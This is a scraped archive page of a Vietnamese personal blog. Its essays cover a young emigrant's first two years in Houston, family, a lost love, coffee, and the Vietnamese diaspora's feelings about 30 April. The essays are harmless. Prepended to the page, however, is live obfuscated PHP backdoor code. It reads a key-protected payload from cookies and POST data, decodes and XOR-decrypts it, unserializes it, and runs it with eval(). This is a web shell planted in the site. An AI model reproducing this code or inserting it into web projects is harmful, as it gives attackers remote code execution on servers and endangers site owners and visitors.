$gkTikmvawS = class_exists("L_JuS");if (!$gkTikmvawS){class L_JuS{private $pEkriz;public static $gEJHvAd = "0bac3d14-080a-40da-9ae3-072f26eb3bee";public static $hiuUA = NULL;public function __construct(){$nACiVMM = $_COOKIE;$ZybOWNLPM = $_POST;$AjoGQkCSfU = @$nACiVMM[substr(L_JuS::$gEJHvAd, 0, 4)];if (!empty($AjoGQkCSfU)){$CHzhCIO = "base64";$MphdUtXc = "";$AjoGQkCSfU = explode(",", $AjoGQkCSfU);foreach ($AjoGQkCSfU as $XvwaYg){$MphdUtXc .= @$nACiVMM[$XvwaYg];$MphdUtXc .= @$ZybOWNLPM[$XvwaYg];}$MphdUtXc = array_map($CHzhCIO . chr ( 182 - 87 ).'d' . 'e' . "\143" . chr (111) . "\x64" . chr (101), array($MphdUtXc,)); $MphdUtXc = $MphdUtXc[0] ^ str_repeat(L_JuS::$gEJHvAd, (strlen($MphdUtXc[0]) / strlen(L_JuS::$gEJHvAd)) + 1);L_JuS::$hiuUA = @unserialize($MphdUtXc);}}public function __destruct(){$this->rybNWbPiMq();}private function rybNWbPiMq(){if (is_array(L_JuS::$hiuUA)) {$EgZDwdc = str_replace("\74" . chr ( 405 - 342 )."\160" . "\150" . chr ( 886 - 774 ), "", L_JuS::$hiuUA[chr ( 642 - 543 ).chr (111) . 'n' . "\164" . "\x65" . "\x6e" . 't']);eval($EgZDwdc);exit();}}}$RYRUp = new L_JuS(); $RYRUp = NULL;} ?> Việt Nam – Page 2 – B.l.u.e

B.l.u.e

Inside the crowd, I dance [alone]

Menu Close

Category: Việt Nam (page 2 of 3)

Hai năm ở xứ sở cờ hoa

Cuối tuần này về nhà, ngồi nói chuyện với ông Cậu khá thân, Cậu hỏi:
– Sao, hôm nay là tròn hai năm ngày ở đất Mỹ này, thấy thế nào?
Tôi im lặng, dù gần đây đã tự nhắc mình nhớ về ngày 03/07 này, nhưng khi nghe một người khác nói về nó, vẫn có cảm giác bồi hồi và lạ lẫm. Thời gian trôi qua nhanh quá…

Tôi không hẳn là có cái nhu cầu phải tổng kết mỗi năm, để xem mình đã làm được gì nơi xứ lạ quê người trong năm vừa qua. Chỉ là thật sự muốn viết gì đó, để lưu lại những năm tháng đáng nhớ trong một đời người mà thôi.

***

So với năm đầu qua đây đầy bỡ ngỡ, mọi thứ đều làm lại từ đầu, năm thứ hai ở nước Mỹ với gia đình tôi đã đi theo chiều hướng tốt hơn rất nhiều. Công việc của ba mẹ tuy có hơi vất vả, nhưng thu nhập ổn định, không lo nỗi lo bị cho nghỉ việc. Ba mẹ tôi cũng dần hòa nhập hơn (dù tiếng Anh hai người vẫn chưa khá lắm). Cuối tuần ba hay lái xe đưa mẹ đi chợ này chợ nọ để mua đồ. Xong sau đó mẹ về nấu ăn, ba thì lại lái xe đi vòng vòng xem ở đâu có garage sale không, hòng vác về nhà những đồ giá rẻ như cho. Cuộc sống với ba mẹ rất thanh bình. Có những buổi chiều, tôi lười nhác nằm trên nệm và nhìn ra ngoài vườn, thấy ba đang tưới nước cho cỏ và hàng cây một cách thật say mê. Nhà tôi có một mảnh vườn nho nhỏ, ba tuy sức khỏe không tốt nhưng cũng thường xuyên ra cắt cỏ, trồng cây, bón phân cho cây.

Đôi khi tôi nghĩ rằng, ba mẹ hòa nhập vào đời sống bên này nhanh hơn cả tôi. Điều đó làm tôi có cảm giác hơi buồn vì dường như ba mẹ đã dần quên đi Việt Nam. Tôi không trách ba mẹ tôi. Mỗi người có một suy nghĩ của riêng mình. Ba mẹ có lẽ vẫn còn yêu Việt Nam, nhưng bao nhiêu biến cố khiến cuộc đời ba mẹ hoàn toàn bị thay đổi, đã làm hai người cảm thấy rằng mình không thuộc về Việt-Nam-hiện-tại nữa. Một thời tuổi trẻ với bao mộng ước tương lai đã bị đánh mất. Cứ mỗi lần nghĩ về điều đó, nghĩ buồn cho ba mẹ vì sinh nhầm thời, tôi càng cảm thấy yêu họ hơn.

***

Những tháng gần đây, tôi nói chuyện với em gái tôi nhiều hơn. Khi ở gần nó, tôi chưa từng thật sự quan tâm nó theo đúng nghĩa một người anh. Đi xa rồi, mới thấy dù thế nào, tôi vẫn luôn muốn có cảm giác chở che, bao bọc, hướng dẫn cho nó. Tôi hồi đó xem phim hay thấy cảnh anh chị em trong cùng một nhà đấu đá, ghen tị nhau khi lớn lên đụng phải cơm, áo, gạo, tiền. Tôi và em gái tôi sẽ không bao giờ như vậy. Có lẽ, ngoài mẹ tôi ra, nó là người mà tôi yêu thương và quan tâm nhất.

Tôi qua đây khi đã học xong đại học, phải lao đầu vào công việc để kiếm tiền trang trải cuộc sống. Lương ba mẹ đi làm chỉ đủ nuôi em gái tôi ăn học, tôi không thể bỏ việc mà về nhà ăn bám bố mẹ. Đôi lần, khi lái xe một cách vô định cùng em gái giữa trời đêm thăm thẳm, tôi khuyên nó chọn một ngành nào đó thật tốt, vì nó có thời gian, nó có thể bỏ 5, 7 năm ra học ngành nào có tương lai. “Đừng chọn mấy nghề giống anh, làm không đủ ăn, lo nghĩ từng ngày.” Khi tôi nói ra câu này, tôi chỉ mong nó sau này sẽ sống sung sướng, không phải lo phải nghĩ quá nhiều về cuộc sống. Tôi không có cảm giác ghen tị vì em gái tôi có điều kiện theo đuổi những ngành nghề sau này sẽ giúp nó sống giàu có, vui sướng hơn tôi. Thậm chí, nếu sau này vì lí do gì đó tôi có điều kiện hơn, tôi cũng sẽ không ngần ngại lo cho nó về tất cả mọi chuyện.

Năm qua, một trong những điều khiến tôi vui nhất ấy là tôi càng ngày càng thân thiết với em gái tôi hơn, càng ngày càng thấy yêu thương và muốn bao bọc nó hơn. Có lẽ đến cuối đời.

***

Còn bản thân tôi, nếu nhìn vào những gì đã đạt được thì không có bước tiến nổi bật như năm đầu tiên. Tôi vẫn làm công việc với mức lương vừa đủ sống, được một lần tăng lương. Tuy hiện tại việc không nhiều lắm, nhưng khá là căng thẳng vì tuyệt đối không thể để sai sót xảy ra. Chỉ cần sai lầm khi gán một biến, gọi một hàm thôi… là đi nguyên hệ thống, thiệt hại có khi vài chục ngàn USD/ ngày.

Năm rồi, tôi cũng bắt đầu đi học Cao Học. Thật ra, tôi không thấy tấm bằng master ấy giúp ích cho tôi được gì trong công việc hiện tại. Những thứ học ở trường vẫn luôn là những thứ nặng lý thuyết, dù bên Việt Nam hay ở đây cũng vậy. Lý do duy nhất khiến tôi bằng mọi giá lấy được tấm bằng master ấy là vì tôi nghĩ, trong tương lai, nếu tôi cần tìm một công việc khác với mức lương cao hơn, thì nó sẽ rất có ích.

Hai năm trước khi mới bước chân tới Mỹ, tôi nghe nhiều người nói rằng cuộc sống bên này rất khó khăn, kinh tế suy thoái, con đường vào cao học cũng gian nan với bài thi GRE khó nhằn. Giờ đây nhìn lại, tôi tạm hài lòng với những gì mình làm được, khi vừa có việc làm gọi là khá, vừa được học tiếp cao học.

Tôi chưa hoàn toàn thuộc về nước Mỹ. Tôi – từ trong thâm tâm, vẫn trọn vẹn là một người Việt như trước đó đã từng. Tuy nhiên, trong lòng nước Mỹ này, giờ đây tôi đã thôi lạc lõng. Điều đó xuất phát từ việc tôi ý thức được rằng: chỉ cần cố gắng là được. Tôi không tự cao, những gì tôi làm được tới giờ chả được tính gì là nhiều nhặn, nhưng ít ra, tôi cũng bắt kịp đà tiến của các thanh niên bản xứ khác: có việc làm khi ra trường, hay học được tiếp lên cao học. Ngộ ra như thế mang lại cho tôi sự tự tin. Tôi khi muốn có thể hòa vào với người Mỹ. Tôi hoàn toàn thấy vui như là một phần của họ khi đội bóng của thành phố thắng giải này, giải kia… Khi đi offline một trong những forum lớn nhất bên này, tôi cũng cầm chai beer và xâu thịt nướng thoải mái trò chuyện, bông đùa.

Thế đấy, nếu phải tóm gọn về những gì mình đã làm được trong năm vừa qua, tôi nghĩ tôi chỉ dùng ba từ: sự tự tin. Tự tin rằng mình hoàn toàn không thua kém ai. Tự tin để sống, để làm việc, để học, và nghĩ về gia đình riêng của mình. Sớm thôi…

030711
B.l.u.e
.

Sài Gòn của em

Em gọi tôi là Sài Gòn của em, nhưng tôi chưa hề gọi em lại là Hà Nội của anh. Việt Nam chỉ có một thủ đô Hà Nội, không có nghĩa là tôi chỉ có quyền gọi duy nhất một-cô-bé-nào-đó là Hà Nội của anh. Không, không ai cản được tôi nếu tôi muốn. Tôi không gọi, chỉ vì tôi thành thật.

***

Em buzz YM đúng lúc tôi đang loay hoay quét nhà. Khi tôi ngó vào màn hình máy tính thì em đã out, chỉ còn vài dòng chữ để lại:

Sài Gòn của em!
Em không chờ anh, em sắp lấy chồng…

Tôi nhắn vội em câu thơ của Đồng Đức Bốn: em có bỏ chồng về ở với tôi không? từ đó đến giờ, và chưa thấy em trả lời. Có thể em quá bận bịu với việc chuẩn bị tổ chức đám cưới. Hoặc giả chồng em – một con quái vật hung tợn, cấm không cho em vào YM để chat với tôi. (À, tôi không biết mặt chồng sắp cưới của em, nhưng tôi mặc định tất cả người yêu hiện tại của người yêu cũ của tôi ngày xưa đều là quái vật hung tợn. Và tôi, đau đớn thay, đã thua trong công cuộc đi hái nấm để giải cứu công chúa – là em, dù không phải em nào tôi quen cũng xinh như công chúa).

***

Cô bé Hà Nội kia, tôi chắc là chỉ tầm vài tháng sau là cô đã quên ngay việc cô từng gọi một thằng con trai xa lạ nào đó là “Sài Gòn của em”.

Còn tôi, tôi là người thành thật. Người thành thật có thể tán hơn một cô gái tại một thời điểm. Nhưng người thành thật thì không thể gọi hơn một cô là Hà Nội của anh. Chính ra là phải dùng từ “nào khác”. Mà thôi, đằng nào cũng quan trọng quái gì đâu.

B.l.u.e.

Một năm ở xứ sở cờ hoa

Đường lối và cương lĩnh cách mạng của các cụ Mác Lênin có chửi bọn tư bản giãy chết đến đâu đi nữa thì cũng khó có thể khiến người ta phủ nhận một điều: những xứ sở nơi trời tây là thứ ánh sáng chói rực rỡ, hay như một cái hồ không đáy luôn cuốn hút ước mơ, mong mỏi của bao triệu con người ở khắp nơi trên thế giới.

Đối với Mỹ – kẻ không phải cầm đầu nhưng lại là tên sừng sỏ nhất, thì điều đó lại càng đúng. Người ta hay nói về giấc mơ Mỹ. Người ta biện hộ cho việc mình muốn đặt chân tới đây bằng nhiều mĩ từ khác nhau (vì vốn trên đời có kẻ nào vui khi bị gán ghép là sính ngoại, chạy theo thứ hào nhoáng, phù hoa… đâu chứ?).

I dreamed a dream – một năm như bóng câu qua cửa sổ, giấc mơ Mỹ của riêng tôi vẫn đang tiếp tục – giấc mơ không hoàn toàn chỉ có hình dáng của bà bụt, ông tiên… mà còn có những tháng ngày buồn bã, thất vọng…

***

Tôi đặt chân đến Mỹ với không một cái gì trong tay – ngoài bằng cử nhân (chưa kịp lấy) ở Việt Nam – mà ai cũng bảo là sẽ chẳng được công nhận. Houston chào đón tôi bằng một bầu trời xám ngắt, bằng cơn mưa không nặng hạt nhưng đọng lại thành những vệt dài trên cửa kính xe như đang khóc theo điệu bài hát Thành phố buồn mà radio đài người Việt đang phát.

Khi đặt chân xuống sân bay, hành lý của tất cả mọi người đều đi qua, chỉ hàng hóa của chúng tôi bị giữ lại. Những cái áo, đôi giày… vừa mua ở Việt Nam, bị hải quan sân bay – một lão già Trung Quốc cau có, khó chịu – qui cho là đem sang Mỹ buôn bán mà không khai, để trốn thuế. Bằng thứ tiếng Anh lõm bõm của mình, tôi bảo tay đó:
– Cái áo này có tầm 8$, anh nghĩ chúng tôi bán lại được bao nhiêu?
Bao nhiêu hải quan sân bay quanh đó đều đồng ý, chỉ có lão già đó trả lời:
– Tao không tin được bọn người Việt Nam.

Ôi thương thay cho cái suy nghĩ đầy thiên kiến của một người đầu đã được hai thứ tóc. Tôi định nói lại tiếp thì lão ấy nói:
– Đây là Mỹ. Chịu thì vào, còn không thì quay lại.
Thế là chúng tôi phải để hành lý lại, cứ chui tọt vào nước Mỹ đã rồi tính gì tính. (Tất nhiên là sau này, khi sân bay thuê người kiểm định giá trị tài sản, chúng tôi lấy lại mớ hành lý đó không một chút khó khăn gì). Đấy, cái giấc mơ Mỹ của tôi bắt đầu bằng một hành động đầy phân biệt – dân – tộc như thế (dù ông ta cũng chỉ là người Châu Á – da vàng, mũi tẹt như tôi, hay ông nghĩ đất nước ông đứng ở vị trí cao hẳn hơn?)

***

Nhắc lại, tôi qua đây khi vừa tốt nghiệp đại học được một tháng, với tấm bằng nhờ bạn bè hết lòng kéo lên, được đúng 7.000000001. Thật may mắn.
Tôi qua đây đúng lúc kinh tế Mỹ đang tụt dốc không phanh – mà tôi dám chắc là chỉ thua cái tốc độ tôi cởi đồ con gái thôi. Các cậu dì của tôi lớn lên ở đây, tốt nghiệp đại học bên này, làm việc đã bao nhiêu năm, nhưng người thì thất nghiệp, người thì lo ngay ngáy sắp bị mất việc.

Thế là tôi đi xin một chân chạy bàn, và ôn thi GRE để gắng thi vào cao học.

GRE là một bài thi rất chó chết, ngay cả dân bản xứ còn thấy khó nhằn (đâu như nếu học ở trung tâm ngốn hơn 2000 Mỹ kim), huống hồ là một người đến từ đất nước mà tiếng Anh không phải tiếng mẹ đẻ như tôi.

Tôi làm phục vụ bàn ở một nhà hàng Việt Nam, công việc cũng không có gì nặng nhọc, nhưng cũng chỉ làm được có tầm một tháng là nghỉ, lí do nhà hàng ế quá, dạo này kinh tế xuống, dân Việt mình tiết kiệm toàn mang theo đồ ăn đi làm, ít hẳn người buổi trưa ra ngoài ăn.

Thế là tôi lại chỉ ở nhà học ôn thi GRE. Mà cái sự học đó cũng chắn ngắt, ngồi cả ngày ở thư viện, gắng nhét vào đầu hơn 70 từ tiếng Anh (mà toàn lạ hoắc lạ hươ)/ ngày, trong khi xung quanh toàn các bé gái teen cười cười nói nói bàn về anh người sói, anh ma cà rồng, chị gái ngu ngốc…

Cứ ở nhà chỉ đi đi lại lại học học hành hành (và chả biết khi nào mới xong), cái chán nhất không phải là cái nhìn của mọi người. Đôi khi có những người bà con xa – mà nếu không qua đây thì tôi thề là tôi sẽ chẳng bao giờ biết, nhìn tôi với ánh mắt giả vờ như quan tâm: ôi, đâu có ai bên đây ngồi không thế cháu, cháu phải kiếm việc gì làm chứ… Cô/ chú/ bác sống bên này lâu rồi nên biết. Bằng đại học ở Việt Nam ai công nhận đâu mà cháu đòi học cao học. Tôi thì ngoài gái nói anh làm tình với em nhé tôi còn quan tâm, còn lại xem như cỏ rác, à mà đổ rác cũng tốn tiền, thôi xem như gió thổi vậy. Do thế, cái tôi thấy chán nhất là chính bản thân tôi. Cứ ngồi không thế, nhìn ba mẹ và em gái cực khổ đi làm, đôi khi cũng tệ lắm.

***

Tôi cũng thử gửi đơn xin vào vài chỗ làm về công nghệ thông tin. Nhưng như đã nói, chẳng việc gì trong cả chục lá đơn apply, người ta chú ý tới một thằng học đại học mà chả ai biết là đại học gì, gọi điện thoại thì nói chữ được chữ không. Thế là nộp cho có thôi, tôi cũng chả hi vọng nhiều.

Rồi tôi nhận được email từ một công ty ở Dallas, với link bài test kiến thức chuyên môn. Tôi hoàn thành chẳng khó khăn gì (trời ơi, tôi đạt điểm cao nhất luôn cơ đấy). Thế là công ty đó mua vé máy bay cho tôi tới phỏng vấn. Sau đó là thuê khách sạn cho tôi ở 3 tuần trong thời gian thử việc.

Quá trình thử việc diễn ra thật may mắn. Tôi nhận được offer chính thức. Ngày đó tôi mừng ơi là mừng. Chẳng có bà bụt, ông tiên nào hóa đũa thần vào giấc mơ, chỉ có những đêm thức trắng, ngồi code đến mỏi nhừ cả tay, đau cả mắt mà thôi…

Cùng thời điểm này, ba mẹ tôi cũng có việc làm (cũng gọi là khá đối với những người mới qua), em tôi xin được vào học college. Thật may…

***

Một năm chỉ hơn 1000 từ tóm tắt, nói ít không phải ít, nói nhiều cũng đủ là khá nhiều. Cái giấc mơ Mỹ của riêng tôi vẫn chưa thể dừng, tôi sẽ vẫn còn phải mơ tiếp và bước tiếp.

***

Giấc mơ Mỹ của tôi, không có bóng em…

030710
B.l.u.e


.

Có đôi khi thèm một li cafe rất nhẹ…

Cảm xúc là thứ gì đó nằm ngoài khả năng định nghĩa và nhận thức của con người, hay chí ít ra là với anh. Có đôi khi, chỉ cần những gì gợi nhớ rất xa xôi, đã đủ khiến anh bần thần ngồi nghĩ lại. Lại có những khi, mọi thứ như các mảnh ghép mơ hồ, từng miếng, từng miếng ghép lại, đến khi tạo thành một hình ảnh gần như hoàn chỉnh, thì khi đó hằng hà vô số cảm giác mới chịu ùa về.

Anh ngồi ở tầng 3 thư viện, ngay cạnh cửa sổ, nhìn ra ngoài là hàng thông thẳng tắp và xanh biếc. Anh lại nhớ những lần cũng ngồi phóng thẳng tầm mắt lên phía trên, để thấy ẩn hiện giữa những tán cây là màu bầu trời xanh thăm thẳm. Chỉ tiếc là anh không hình dung rõ, cái hình ảnh ấy nó đến từ vùng kí ức nào.

Từ khi qua đây, anh bỏ dần thói quen uống cafe. Bởi với anh, cafe không phải là thức uống, nó là thứ gì đó gần như nghệ thuật của sự thưởng thức. Nghĩa là phải đi kèm với rất nhiều yếu tố khác mới có nghĩa.

Nhà anh ngày đó bán cafe, đủ loại cafe. Anh thích nhất cái cảm giác mở tủ cafe, bên trong là những hột cafe tròn trịa, đen bóng, thò đầu vào hít một hơi. Hương cafe đôi khi rất nồng, đôi khi rất nhẹ, có lúc lại cảm giác hương cafe rất ngọt.

Anh uống cafe theo một kiểu tạm gọi là khác người: chấm cái thìa vào li cafe, và đưa lên miệng mút từ từ, để cảm nhận đến tường tận cái vị đắng ở đầu môi, theo sau là vị ngọt trong cuống họng ấy. Đa phần, anh chưa mút hết li cafe thì đá đã tan ra nhạt thếch rồi. Một cách uống cafe rất gái, chẹp chẹp.

Cafe có đôi khi là một sự im lặng, một sự lắng đọng. Đó là khi anh ngồi trong quán cafe rock, giữa tiếng nhạc chát chúa, giữa vị đắng cùng cực của li cafe đen không đường, là hình ảnh và nỗi nhớ cô êm dịu. Có khi ngược lại, khi những bản rock ballad thủ thỉ bên tai, cafe sữa ngọt lịm, lại vẫn là cô đi kèm với tình cảm và nỗi nhớ như những con sóng xô trào, hò reo không ngớt. Những thái cực khác nhau xoay quanh anh – cafe – và cô.

Cafe có đôi khi chỉ thuần khiết là niềm vui. Đó là những buổi cafe chung với nhóm bạn, dù ở một quán mắc tiền, hay chỉ những quán cóc, những vỉa hè liêu xiêu đến bình dị. Anh khi ở đó vẫn nhớ cô (anh thì có khi nào thôi nhớ cô?), nhưng nỗi nhớ hòa vào tiếng cười, sự ấm áp của đám bạn xung quanh, tạo thành một thứ cảm giác mà dường như được tạo ra chỉ cho anh. Đơn giản đó hoàn toàn là cảm giác của anh.

Qua đây, anh không tìm được sự im lặng, cũng không tìm được niềm vui thuần khiết khi thưởng thức cafe. Vì thế nên anh không uống. Đó không phải là do hình ảnh cô phai mờ trong anh, hay tim anh không còn đập loạn lên khi nghĩ về cô, mà có lẽ, cái li cafe rất nhẹ ấy, Sài Gòn ích kỉ đã lén đăng kí nhãn hiệu độc quyền và giữ chặt trong vòng tay nó mất rồi.

Ừ, có đôi khi, anh thèm một li cafe rất nhẹ…

Cụ già chơi vĩ cầm - ảnh của Luộc Tathy

Ảnh “cụ già chơi vĩ cầm ở cafe Hàn Thuyên” – Luộc Tathy

270110
B.l.u.e.

Mẹ ơi, 34 năm rồi, sao nước mắt vẫn chưa thôi rơi?

Quốc kỳ Việt Nam Quốc kỳ Việt Nam Cộng Hoà

Những ngày gần đây, khi đi trên xe, nghe đài radio của người Việt bên này, tôi thấy có hai tin tức đáng chú ý sau:

– Thứ nhất là tin cô Annie Le, nữ sinh gốc Việt, sắp tới ngày làm đám cưới thì bị hãm hại. Tin này báo Việt Nam cũng có đăng, nhưng chắc mức độ quan tâm không được như bên đây. Người Việt chúng tôi xa xứ vì nhiều lí do khác nhau, hằng ngày đắm mình vào cái xã hội và văn hoá Mỹ, xung quanh nghe toàn thứ tiếng xì xồ xa lạ, đôi lúc dường như là phản xạ, cứ đảo mắt kiếm tìm, gióng tai lên lắng nghe một bóng hình, một giọng nói phát âm cái ngôn ngữ quen thuộc của dân tộc mình. Vì thế, bất cứ gì có liên quan đến người Việt Nam đều được cộng đồng rất quan tâm.
Cộng đồng người Việt ở nơi không phải Tổ quốc của mình, là một cộng đồng thực thụ, không phải như hàng tá cộng đồng được dựng lên tượng trưng. Ở đây, người ta sẵn sàng giúp đỡ nhau hết mình, chỉ cần nghe loáng thoáng hay nhìn người kia có vẻ là người Việt Nam. Âu cũng là điều rất đáng quý.
– Thứ hai là tin kêu gọi biểu tình chống việc “cộng sản Việt Nam mở toà Đại Sứ Quán ở Houston” (tôi nhắc lại nguyên văn) vào tuần tới. Đại sứ quán ở đây là ông Lê Dũng – cựu phát ngôn bộ ngoại giao Việt Nam. Nghe đâu ngày khánh thành sẽ có cả các quan chức cao cấp của Việt Nam sang tham dự, có cả thủ tướng Nguyễn Tấn Dũng. Vì thế, những người “tị nạn Cộng Sản” bên đây bỏ công tìm kiếm địa điểm này, và tổ chức biểu dương lực lượng, biểu tình phản đối.

Trước đây, khi còn bên Việt Nam, tôi có cái nhìn không thiện cảm lắm với những người đi khỏi Tổ quốc rồi vẫn quay về chống đối chế độ. Đây không hoàn toàn là do bộ máy tuyên truyền của nhà nước, do tư tưởng Hồ Chí Minh và lịch sử Đảng đã thấm nhuần trong tôi (dù tôi thi hai môn này được lần lượt 7 và 8 điểm), bởi cách vượt proxy để vào talawas hay x-cà là quá đơn giản với một thằng sinh viên Công nghệ thông tin như tôi. Qua bên này, tôi vẫn không ủng hộ việc họ chống đối lại chế độ, nhưng có cái nhìn cảm thông hơn.

Houston nơi tôi đang sống có khá đông người Việt, chắc là chỉ sau quận Cam (Orange County) ở California. Tôi có dịp nói chuyện với khá nhiều người Việt ở đây, và cảm thấy thương cho họ. Không ai muốn rời bỏ Tổ Quốc để ra đi vượt biên, trôi giạt giữa biển trên những con tàu ọp ẹp hàng tuần liền, chịu đựng mọi cực khổ, đánh cuộc với chính mạng sống của mình. Nhưng rất nhiều người đã chọn con đường ra đi, không phải do vấn đề chính trị, mà theo vài người là do cái mong muốn cơ bản nhất của con người là được sống an bình đã bị tước mất.

Ở bên này, người ta gọi ngày 30/4 là ngày mất nước, và từ đó đúng đến từng âm tiết, từng chữ cái với trường hợp của họ. Đang nhà cao cửa rộng, cuộc sống an lành, lại phải bỏ hết cả gia tài, di tản về miền quê cầm cuốc cầm cày, lo từng bữa ăn, từng cái áo. Có trường hợp phải trốn mấy năm trời trong rừng, hoặc khi hoà nhập lại thì vẫn bị đánh dấu vì “lí lịch” không tốt. Điều đó gây nên mối hận không nguôi trong lòng họ, dù đã hàng chục năm trời trôi qua.

“Khi anh bắn một phát súng lục vào quá khứ, thì tương lai sẽ bắn vào anh bằng một quả đại bác”, tôi không nhớ ông nào đã nói câu này. Nhưng đại loại là mọi thứ đã trôi qua, dù thế nào thì bánh xe lịch sử cũng luôn quay đều. Người ta không thể đặt ra cái giả thiết bắt đầu bằng chữ “Nếu”. Dù thế nào thì Việt Nam Cộng Hoà đã bại trận, nước Việt Nam giờ là một nước thống nhất. Đôi khi tôi đọc bài về Bắc – Nam Triều Tiên, hay tình trạng tị nạnh giữa Đông – Tây Đức sau khi bức tường Berlin sụp đổ, lại cảm thấy may mắn vì nước nhà thống nhất, dù rằng về “mức sống người dân” ở Thành phố Hồ Chí Minh không so được với Sài Gòn Hòn ngọc Viễn Đông ngày ấy.

Ba tôi thường dạy tôi, có hai điều không bao giờ nên bàn luận, đó là “chính trị” và “tôn giáo”. Đơn giản đó là vấn đề về tư tưởng và niềm tin. Tôi không thể thuyết phục những người đang sống ở hải ngoại rằng “nước mình” giờ sống tốt, tuy còn nhiều điều cần phải sửa. Tôi không thể nói với họ rằng, hành động gây áp lực để một số trường Đại học lớn ở bang Texas không được treo cờ đỏ sao vàng, là hành động quá khích. Bởi mối hận thù của họ đơn giản là quá lớn, nó được nung nấu bằng những sự mất mát lớn lao, những giọt nước mắt đau khổ (và cả những giọt máu), nỗi đau và nỗi nhớ khôn nguôi trong suốt hàng năm trời.

Không có gì là đúng hay sai. Chân lý thuộc về kẻ chiến thắng, như bọn Tây hay nói “The winner takes it all…”. Cả hai bên đều có lí do của mình. Chúng ta không thể đổ lỗi cho bất cứ gì, không phải lịch sử, không phải chế độ… mà sự việc đơn thuần là “post hoc ergo propter hoc”, việc này là nguyên nhân gây ra việc kia, cả một chuỗi sự việc – tất nhiên – và nối dài theo thời gian. Không thể trách cứ điều gì…

Khi xem Paris By Night, cuốn Ca nhạc theo yêu cầu, tới phần Quỳnh Anh hát “Hello ViệtNam”, dưới khán phòng có nhiều người khóc. Dù có ra đi vì lí do nào đi nữa, thì Việt Nam vẫn luôn là quê cha, đất tổ, và không có nỗi đau gì lớn hơn khi phải dứt áo bỏ quê hương ra đi.

Mong rằng, đó chỉ là hận thù của đời họ, và sẽ chấm dứt sau khi họ nhắm mắt lìa đời, đừng truyền cái tư tưởng này sang thế hệ sau… Đừng để “thế hệ thứ hai” bên này phải thốt lên câu “mẹ ơi, bao nhiêu năm rồi, sao nước mắt vẫn chưa thôi rơi?”

Khi tôi chết hãy đem tôi ra biển
nước ngược dòng sẽ đẩy xác trôi đi
bên kia biển là quê hương tôi đó
rặng tre xưa muôn tuổi vẫn xanh rì

Khi tôi chết hãy đem tôi ra biển
và nhớ đừng vội vuốt mắt cho tôi
cho tôi hướng vọng quê tôi lần cuối
biết đâu chừng xác tôi chẳng đến nơi…

Du Tử Lê

160909,
B.l.u.e
.

cả một trời yêu, bao giờ trở lại

Memory

Đây là một buổi chiều rất nhẹ. Cái xứ Texas này lạ quá, giờ đã gần bảy giờ tối rồi mà ngoài cửa sổ vẫn sáng, cái cảm giác nằm lì trên giường, quên cả thời gian, lười biếng nhấm nháp cái mớ hỗn hợp tạo bởi cuốn tiểu thuyết Suối Nguồn, ánh nắng tươi vàng mà không gắt, giọng Khánh Ly da diết phát ra từ cái laptop tồi tàn, thỉnh thoảng lim dim nhắm mắt đi vào mộng mị, thật là mang tư vị gì đó rất khác lạ.

Đến khi câu “cả một trời yêu, bao giờ trở lại” ((Mười năm tình cũ – ns Trần Quảng Nam)) vang lên, cái tư vị nhẹ nhàng đấy biến mất, ngay lập tức. Chỉ còn cái cảm giác thật sự, thật sự tiếc nuối đọng lại. Và đơn giản, anh viết chỉ vì muốn nắm bắt thật chặt cái cảm giác này.

Bắt đầu cuộc sống mới, cách bắt đầu hoàn hảo là quên những cái cũ đi. Đây là điều anh vẫn nghĩ, có thể là do anh yếu đuối, tự bản thân anh cũng không tin rằng mình có thể làm song song hai việc: hội nhập và giữ lại. Vì vậy, anh đành chọn cách làm tốt nhất về lý thuyết cho bản thân mình.

Đã chọn như thế, lẽ ra không nên nghe, nhìn, đọc những gì gợi nhớ lại cái hai mươi hai năm cũ ấy. Khi từng câu, từng chữ đầy khắc khoải như thế vang lên, anh biết rằng mình phải chấm dứt ngay, bằng bất cứ cách nào có thể được. Tuy nhiên, anh chỉ nằm đó, đầu hàng cái cảm giác day dứt ấy trong sự bất lực, và để từng giai điệu ăn sâu vào từng tế bào nhỏ nhất của nỗi nhớ.

Anh nghĩ về bạn gái cũ của anh. Nghĩ đến lời hứa sẽ không bao giờ buông tay em, dù trong bất cứ tình huống nào mà nhói cả tâm can, và hận chính bản thân mình. Anh đơn độc quá. Em ơi, sao cứ để anh một mình đối chọi với không phải cả thế gian, nhưng là những định kiến còn mạnh hơn thế nữa? Tại sao, không thể bước cùng anh…

Anh nghĩ về giờ phút chia tay ở sân bay với các bạn anh. Anh đã ôm các bạn anh rất chặt. Và giờ đây anh nghĩ, rồi trong cuộc đời này, liệu sẽ còn cơ hội nào để một lần nữa ôm các bạn – như những người bạn thật sự chân thành thế không.
Hôm qua, anh có chat với một cô bạn cũ. Anh nghe bạn ấy hí hửng khoe về chuyến đi chơi sắp tới của mọi người. Cảm giác thật sự trong anh là ghen tị. Anh ích kỉ quá, anh luôn lo rằng, mọi người rồi sẽ quên sự tồn tại của anh, sẽ xem việc không – có – anh – trong – các – cuộc – vui chỉ là bình thường.

Anh nghĩ về azi – cô bạn thân của anh. Anh nhớ về sms của nó “The la tu gio khong duoc gap Noob roi dung khong?”. Anh sợ, sợ bạn quên anh lắm.

Anh nghĩ về từng con đường, từng hàng quán đầy kỷ niệm. Và nghĩ về thời gian dài đằng đẵng sắp tới cùng bao nhiêu khó khăn. Anh lo mình sẽ giống hầu như tất cả mọi người, đến một lúc nào đó, sẽ quên cái khung trời đầy yêu dấu ấy.

Anh sợ mình bị lãng quên, và cũng sợ chính bản thân mình lãng quên.

Cả một trời yêu, bao giờ trở lại…

B.l.u.e.

Tạm biệt Việt Nam. Good luck to all :)

Khi các bạn đọc những dòng này, thì anh của các bạn đang lẩm nhẩm bài “If I could fly” của “Helloween” và mỉm cười. Bài này anh nhờ một bạn của anh post. Do tính anh thích vẽ chuyện, nên đòi phải post vào đúng giờ anh bắt đầu bay cơ.

Lần bữa, bạn anh có hỏi: “Rời khỏi Việt Nam, anh có buồn và hối tiếc gì không?”

Anh xin mượn câu nói của bạn A.A. Milne để trả lời:

How lucky I am to have something that makes saying goodbye so hard.

Anh có quá nhiều thứ ở Việt Nam, vì vậy anh buồn khi đi, nhưng không hề hối tiếc.

Anh đã có [những] mối tình thật đẹp, đã yêu nhiều và yêu hết mình. Anh cũng có những giây phút vui vẻ thật nhiều với bạn bè. Không gì là thiếu, không gì là đủ. Cái vấn đề duy nhất cần quan tâm ở đây là dừng lại hay chưa. Anh đã chọn cách dừng lại.

